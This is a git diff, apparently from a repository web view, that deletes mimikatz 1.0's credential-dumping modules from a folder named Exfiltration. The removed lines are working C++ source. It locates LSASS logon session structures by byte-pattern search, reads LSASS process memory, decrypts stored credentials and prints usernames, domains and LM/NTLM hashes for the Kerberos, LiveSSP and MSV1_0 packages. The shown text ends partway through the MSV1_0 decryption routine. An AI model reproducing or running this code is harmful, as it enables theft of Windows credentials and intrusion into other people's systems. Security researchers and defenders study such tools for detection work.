aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages
diff options
context:
space:
mode:
Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages')
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp135
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h70
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp70
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h44
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp217
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h105
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp92
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.h32
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.cpp94
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/tspkg.h37
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.cpp91
-rw-r--r--Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/wdigest.h29
12 files changed, 0 insertions, 1016 deletions
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp
deleted file mode 100644
index dae52d2..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp
+++ /dev/null
@@ -1,135 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "kerberos.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_kerberos::pModKERBEROS = NULL;
-mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION mod_mimikatz_sekurlsa_kerberos::KerbLogonSessionList = NULL; //reinterpret_cast<mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION>(NULL);
-long mod_mimikatz_sekurlsa_kerberos::offsetMagic = 0;
-PRTL_AVL_TABLE mod_mimikatz_sekurlsa_kerberos::KerbGlobalLogonSessionTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL);
-
-bool mod_mimikatz_sekurlsa_kerberos::getKerberos(vector<wstring> * arguments)
-{
- vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getKerberosLogonData, wstring(L"kerberos")));
- return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_kerberos::searchKerberosFuncs()
-{
-#ifdef _M_X64
- BYTE PTRN_WALL_KerbUnloadLogonSessionTable[]= {0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d};
- LONG OFFS_WALL_KerbUnloadLogonSessionTable = sizeof(PTRN_WALL_KerbUnloadLogonSessionTable);
-
- BYTE PTRN_WALL_KerbFreeLogonSessionList[] = {0x48, 0x3b, 0xfe, 0x0f, 0x84};
- LONG OFFS_WALL_KerbFreeLogonSessionList = -4;
-#elif defined _M_IX86
- BYTE PTRN_WNO8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x1f, 0x53};
- LONG OFFS_WNO8_KerbUnloadLogonSessionTable = -(3 + 4);
- BYTE PTRN_WIN8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x2b, 0x57}; // 2c au lieu de 2b pour avant le RC
- LONG OFFS_WIN8_KerbUnloadLogonSessionTable = -(6 + 4);
-
- BYTE PTRN_WALL_KerbFreeLogonSessionList[] = {0xeb, 0x0f, 0x6a, 0x01, 0x57, 0x56, 0xe8};
- LONG OFFS_WALL_KerbFreeLogonSessionList = -4;
-#endif
- if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModKERBEROS && !(KerbGlobalLogonSessionTable || KerbLogonSessionList))
- {
- PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0;
-
- if(mod_system::GLOB_Version.dwMajorVersion < 6)
- {
- pointeur= reinterpret_cast<PBYTE *>(&KerbLogonSessionList);
- pattern = PTRN_WALL_KerbFreeLogonSessionList;
- taille = sizeof(PTRN_WALL_KerbFreeLogonSessionList);
- offset = OFFS_WALL_KerbFreeLogonSessionList;
-
- if(mod_system::GLOB_Version.dwMinorVersion < 2)
- offsetMagic = 8;
- }
- else
- {
- pointeur= reinterpret_cast<PBYTE *>(&KerbGlobalLogonSessionTable);
-
-#ifdef _M_X64
- pattern = PTRN_WALL_KerbUnloadLogonSessionTable;
- taille = sizeof(PTRN_WALL_KerbUnloadLogonSessionTable);
- offset = OFFS_WALL_KerbUnloadLogonSessionTable;
-#elif defined _M_IX86
- if(mod_system::GLOB_Version.dwBuildNumber < 8000)
- {
- pattern = PTRN_WNO8_KerbUnloadLogonSessionTable;
- taille = sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable);
- offset = OFFS_WNO8_KerbUnloadLogonSessionTable;
- }
- else
- {
- if(mod_system::GLOB_Version.dwBuildNumber < 8400) // petite correction pour avant la RC
- PTRN_WIN8_KerbUnloadLogonSessionTable[3] = 0x2c;
- pattern = PTRN_WIN8_KerbUnloadLogonSessionTable;
- taille = sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable);
- offset = OFFS_WIN8_KerbUnloadLogonSessionTable;
- }
-#endif
- }
-
- if(HMODULE monModule = LoadLibrary(L"kerberos"))
- {
- MODULEINFO mesInfos;
- if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
- {
- mod_memory::genericPatternSearch(pointeur, L"kerberos", pattern, taille, offset);
- *pointeur += pModKERBEROS->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- }
- FreeLibrary(monModule);
- }
- }
- return (pModKERBEROS && (KerbGlobalLogonSessionTable || KerbLogonSessionList));
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logId, __in bool justSecurity)
-{
- if(searchKerberosFuncs())
- {
- PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
- DWORD taille;
- BYTE * monBuff = NULL;
-
- if(KerbGlobalLogonSessionTable)
- {
- taille = sizeof(KIWI_KERBEROS_PRIMARY_CREDENTIAL);
- monBuff = new BYTE[taille];
-
- if(PKIWI_KERBEROS_PRIMARY_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(KerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_PRIMARY_CREDENTIAL, LocallyUniqueIdentifier), logId)))
- {
- if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
- {
- pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(monBuff);
- mesCreds = &pLogSession->credentials;
- }
- }
- }
- else
- {
- taille = sizeof(KIWI_KERBEROS_LOGON_SESSION) + offsetMagic;
- monBuff = new BYTE[taille];
- if(PKIWI_KERBEROS_LOGON_SESSION pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(KerbLogonSessionList), FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier) + offsetMagic, logId)))
- {
- if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS))
- {
- pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(monBuff);
- if(offsetMagic != 0)
- pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(reinterpret_cast<PBYTE>(pLogSession) + offsetMagic);
- mesCreds = &pLogSession->credentials;
- }
- }
- }
- mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
- delete [] monBuff;
- }
- else (*outputStream) << L"n.a. (kerberos KO)";
-
- return true;
-}
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h
deleted file mode 100644
index 1418d4f..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h
+++ /dev/null
@@ -1,70 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_kerberos {
-
-private:
- typedef struct _KIWI_KERBEROS_LOGON_SESSION
- {
- struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
- struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
- DWORD UsageCount;
- PVOID unk0;
- PVOID unk1;
- PVOID unk2;
- DWORD unk3;
- DWORD unk4;
- PVOID unk5;
- PVOID unk6;
- PVOID unk7;
- LUID LocallyUniqueIdentifier;
- #ifdef _M_IX86
- DWORD unk8;
- #endif
- DWORD unk9;
- DWORD unk10;
- PVOID unk11;
- DWORD unk12;
- DWORD unk13;
- PVOID unk14;
- PVOID unk15;
- PVOID unk16;
- KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
- } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
-
- typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
- {
- DWORD unk0;
- PVOID unk1;
- PVOID unk2;
- PVOID unk3;
- #ifdef _M_X64
- BYTE unk4[32];
- #elif defined _M_IX86
- BYTE unk4[20];
- #endif
- LUID LocallyUniqueIdentifier;
- #ifdef _M_X64
- BYTE unk5[44];
- #elif defined _M_IX86
- BYTE unk5[36];
- #endif
- KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
- } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
-
- static PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList;
- static long offsetMagic;
- static PRTL_AVL_TABLE KerbGlobalLogonSessionTable;
- static bool searchKerberosFuncs();
-
-public:
- static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModKERBEROS;
- static bool getKerberos(vector<wstring> * arguments);
- static bool WINAPI getKerberosLogonData(__in PLUID logId, __in bool justSecurity);
-};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp
deleted file mode 100644
index 7f64678..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp
+++ /dev/null
@@ -1,70 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "livessp.h"
-#include "..\..\global.h"
-mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_livessp::pModLIVESSP = NULL;
-mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY mod_mimikatz_sekurlsa_livessp::LiveGlobalLogonSessionList = NULL;//reinterpret_cast<mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY>(NULL);
-
-bool mod_mimikatz_sekurlsa_livessp::getLiveSSP(vector<wstring> * arguments)
-{
- vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getLiveSSPLogonData, wstring(L"livessp")));
- return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_livessp::searchLiveGlobalLogonSessionList()
-{
-#ifdef _M_X64
- BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00};
-#elif defined _M_IX86
- BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0};
-#endif
- LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions = -(5 + 4);
-
- if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModLIVESSP && !LiveGlobalLogonSessionList)
- {
-
- PBYTE *pointeur = reinterpret_cast<PBYTE *>(&LiveGlobalLogonSessionList);
- if(HMODULE monModule = LoadLibrary(L"livessp"))
- {
- MODULEINFO mesInfos;
- if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO)))
- {
- mod_memory::genericPatternSearch(pointeur, L"livessp", PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions);
- *pointeur += pModLIVESSP->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- }
- FreeLibrary(monModule);
- }
- }
- return (pModLIVESSP && LiveGlobalLogonSessionList);
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity)
-{
- if(searchLiveGlobalLogonSessionList())
- {
- PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
- BYTE * monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)], * monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)];
- if(PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId)))
- {
- if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS))
- {
- pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(monBuffP);
- if(pLogSession->suppCreds)
- {
- if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS))
- mesCreds = &(reinterpret_cast<PKIWI_LIVESSP_PRIMARY_CREDENTIAL>(monBuffC)->credentials);
- }
- else (*outputStream) << L"n.s. (SuppCred KO) / ";
- }
- }
- mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true);
- delete [] monBuffC, monBuffP;
- }
- else (*outputStream) << L"n.a. (livessp KO)";
- return true;
-} \ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h
deleted file mode 100644
index 891da63..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h
+++ /dev/null
@@ -1,44 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "../mod_mimikatz_sekurlsa.h"
-
-class mod_mimikatz_sekurlsa_livessp {
-
-private:
- typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
- {
- DWORD isSupp; // 88h
- DWORD unk0;
- KIWI_GENERIC_PRIMARY_CREDENTIAL credentials;
- } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
-
- typedef struct _KIWI_LIVESSP_LIST_ENTRY
- {
- struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
- struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
- PVOID unk0; // 1
- PVOID unk1; // 0FFFFFFFFh
- PVOID unk2; // 0FFFFFFFFh
- PVOID unk3; // 0
- DWORD unk4; // 0
- DWORD unk5; // 0
- PVOID unk6; // 20007D0h
- LUID LocallyUniqueIdentifier;
- LSA_UNICODE_STRING UserName;
- PVOID unk7; // 2000010Dh
- PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
- } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
-
- static PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList;
- static bool searchLiveGlobalLogonSessionList();
-
-public:
- static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModLIVESSP;
- static bool getLiveSSP(vector<wstring> * arguments);
- static bool WINAPI getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity);
-};
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp
deleted file mode 100644
index 39fa015..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp
+++ /dev/null
@@ -1,217 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
- Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#include "msv1_0.h"
-#include "..\..\global.h"
-PLIST_ENTRY mod_mimikatz_sekurlsa_msv1_0::LogonSessionList = NULL;
-PULONG mod_mimikatz_sekurlsa_msv1_0::LogonSessionListCount = NULL;
-
-bool mod_mimikatz_sekurlsa_msv1_0::getMSV(vector<wstring> * arguments)
-{
- vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider;
- monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0")));
- return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider);
-}
-
-bool mod_mimikatz_sekurlsa_msv1_0::searchLogonSessionList()
-{
-#ifdef _M_X64
- BYTE PTRN_WIN6_LogonSessionList[] = {0x4C, 0x03, 0xD8, 0x49, 0x8B, 0x03, 0x48, 0x89};//, 0x06, 0x4C, 0x89, 0x5E};
- BYTE PTRN_WIN5_LogonSessionList[] = {0x4C, 0x8B, 0xDF, 0x49, 0xC1, 0xE3, 0x04, 0x48, 0x8B, 0xCB, 0x4C, 0x03, 0xD8};
-
- LONG OFFS_WALL_LogonSessionList = -sizeof(long);
- LONG OFFS_WN60_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 3 + sizeof(long));
- LONG OFFS_WN61_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long));
- LONG OFFS_WIN5_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 6 + 3 + 8 + 4 + 4 + 2 + 3 + 2 + 2 + sizeof(long));
- LONG OFFS_WIN8_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 3 + 7 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long));
-#elif defined _M_IX86
- BYTE PTRN_WNO8_LogonSessionList[] = {0x89, 0x71, 0x04, 0x89, 0x30, 0x8D, 0x04, 0xBD};
- BYTE PTRN_WIN8_LogonSessionList[] = {0x89, 0x79, 0x04, 0x89, 0x38, 0x8D, 0x04, 0xB5};
- BYTE PTRN_WN51_LogonSessionList[] = {0xFF, 0x50, 0x10, 0x85, 0xC0, 0x0F, 0x84};
-
- LONG OFFS_WNO8_LogonSessionList = -(7 + (sizeof(LONG)));
- LONG OFFS_WIN8_LogonSessionList = -(6 + 3 + 3 + 2 + 2 + (sizeof(LONG)));
- LONG OFFS_WN51_LogonSessionList = sizeof(PTRN_WN51_LogonSessionList) + 4 + 5 + 1 + 6 + 1;
- LONG OFFS_WNO8_LogonSessionListCount = OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long));
- LONG OFFS_WIN5_LogonSessionListCount = OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 1 + 3 + 1 + sizeof(long));
- LONG OFFS_WIN8_LogonSessionListCount = OFFS_WIN8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long));
-#endif
- if(mod_mimikatz_sekurlsa::searchLSASSDatas() && mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && !LogonSessionList)
- {
- PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offsetListe = 0, offsetCount = 0;
-#ifdef _M_X64
- offsetListe = OFFS_WALL_LogonSessionList;
- if(mod_system::GLOB_Version.dwMajorVersion < 6)
- {
- pattern = PTRN_WIN5_LogonSessionList;
- taille = sizeof(PTRN_WIN5_LogonSessionList);
- offsetCount = OFFS_WIN5_LogonSessionListCount;
- }
- else
- {
- pattern = PTRN_WIN6_LogonSessionList;
- taille = sizeof(PTRN_WIN6_LogonSessionList);
- if(mod_system::GLOB_Version.dwBuildNumber < 8000)
- offsetCount = (mod_system::GLOB_Version.dwMinorVersion < 1) ? OFFS_WN60_LogonSessionListCount : OFFS_WN61_LogonSessionListCount;
- else
- offsetCount = OFFS_WIN8_LogonSessionListCount;
- }
-#elif defined _M_IX86
- if(mod_system::GLOB_Version.dwBuildNumber < 8000)
- {
- if((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1))
- {
- pattern = PTRN_WN51_LogonSessionList;
- taille = sizeof(PTRN_WN51_LogonSessionList);
- offsetListe = OFFS_WN51_LogonSessionList;
- }
- else
- {
- pattern = PTRN_WNO8_LogonSessionList;
- taille = sizeof(PTRN_WNO8_LogonSessionList);
- offsetListe = OFFS_WNO8_LogonSessionList;
- offsetCount = (mod_system::GLOB_Version.dwMajorVersion < 6) ? OFFS_WIN5_LogonSessionListCount : OFFS_WNO8_LogonSessionListCount;
- }
- }
- else
- {
- pattern = PTRN_WIN8_LogonSessionList;
- taille = sizeof(PTRN_WIN8_LogonSessionList);
- offsetListe = OFFS_WIN8_LogonSessionList;
- offsetCount = OFFS_WIN8_LogonSessionListCount;
- }
-#endif
- MODULEINFO mesInfos;
- if(GetModuleInformation(GetCurrentProcess(), mod_mimikatz_sekurlsa::hLsaSrv, &mesInfos, sizeof(MODULEINFO)))
- {
- pointeur = reinterpret_cast<PBYTE *>(&LogonSessionList);
- if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetListe))
- {
- *pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- if(offsetCount)
- {
- pointeur = reinterpret_cast<PBYTE *>(&LogonSessionListCount);
- if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetCount))
- *pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll);
- }
- }
- }
- }
- return (mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && LogonSessionList && (((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) || LogonSessionListCount));
-}
-
-bool WINAPI mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in bool justSecurity)
-{
- if(searchLogonSessionList())
- {
- LONG offsetToLuid, offsetToCredentials;
- if(mod_system::GLOB_Version.dwMajorVersion < 6)
- {
- offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, LocallyUniqueIdentifier);
- offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Credentials);
- }
- else
- {
- offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, LocallyUniqueIdentifier);
- offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Credentials);
- if(mod_system::GLOB_Version.dwBuildNumber >= 8000) // pas encore pris le temps de regarder les structures de 8
- {
-#ifdef _M_X64
- offsetToCredentials += 4*sizeof(PVOID);
-#elif defined _M_IX86
- offsetToCredentials += 2*sizeof(PVOID);
-#endif
- }
- }
-
- ULONG nbListes = 0;
- if(LogonSessionListCount)
- mod_memory::readMemory(LogonSessionListCount, &nbListes, sizeof(nbListes), mod_mimikatz_sekurlsa::hLSASS);
- else nbListes = 1;
-
- PLIST_ENTRY pLogSession = NULL;
- for(ULONG i = 0; i < nbListes; i++)
- {
- if(pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LogonSessionList + i), offsetToLuid, logId))
- {
- BYTE * kiwiMSVListEntry = new BYTE[offsetToCredentials + sizeof(PVOID)];
- if(mod_memory::readMemory(pLogSession, kiwiMSVListEntry, offsetToCredentials + sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS))
- {
- PVOID monPtr = *reinterpret_cast<PVOID *>(kiwiMSVListEntry + offsetToCredentials);
- if(monPtr)
- {
- BYTE * kiwiMSVCredentials = new BYTE[sizeof(KIWI_MSV1_0_CREDENTIALS)];
- if(mod_memory::readMemory(monPtr, kiwiMSVCredentials, sizeof(KIWI_MSV1_0_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS))
- {
- PKIWI_MSV1_0_CREDENTIALS mesCreds = reinterpret_cast<PKIWI_MSV1_0_CREDENTIALS>(kiwiMSVCredentials);
- if(mesCreds->PrimaryCredentials)
- {
- BYTE * kiwiMSVPrimaryCredentials = new BYTE[sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)];
- if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS))
- {
- decryptAndDisplayCredsBlock(&reinterpret_cast<PKIWI_MSV1_0_PRIMARY_CREDENTIALS>(kiwiMSVPrimaryCredentials)->Credentials, justSecurity);
- } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)";
- delete [] kiwiMSVPrimaryCredentials;
-
- } else (*outputStream) << L"n.s. (PrimaryCredentials KO)";
-
- }else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)";
- delete [] kiwiMSVCredentials;
-
- } else (*outputStream) << L"n.s. (Credentials KO)";
-
- } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)";
- delete [] kiwiMSVListEntry;
-
- break;
- }
- }
- if(!pLogSession)
- (*outputStream) << L"n.t. (LUID KO)";
- }
- else (*outputStream) << L"n.a. (msv1_0 KO)";
- return true;
-}
-
-bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity)
-{
- if(monBlock->Length > 0 && monBlock->MaximumLength > 0 && monBlock->Buffer)
- {
- BYTE * monBuffer = new BYTE[monBlock->MaximumLength];
- if(mod_memory::readMemory(monBlock->Buffer, monBuffer, monBlock->MaximumLength, mod_mimikatz_sekurlsa::hLSASS))
- {
- mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(monBuffer, monBlock->Length);
- PMSV1_0_PRIMARY_CREDENTIAL mesCreds = reinterpret_cast<PMSV1_0_PRIMARY_CREDENTIAL>(monBuffer);
-
- NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->UserName, false);
- NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->LogonDomainName, false);
-
- wstring lmHash = mod_text::stringOfHex(mesCreds->LmOwfPassword, sizeof(mesCreds->LmOwfPassword));
- wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword));
-
- if(justSecurity)
- (*outputStream) << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }";
- else
- {
- (*outputStream) << endl <<
- L"\t * Utilisateur : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl <<
- L"\t * Domaine : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl <<
- L"\t * Hash LM : " << lmHash << endl <<
- L"\t * Hash NTLM : " << ntHash;
- }
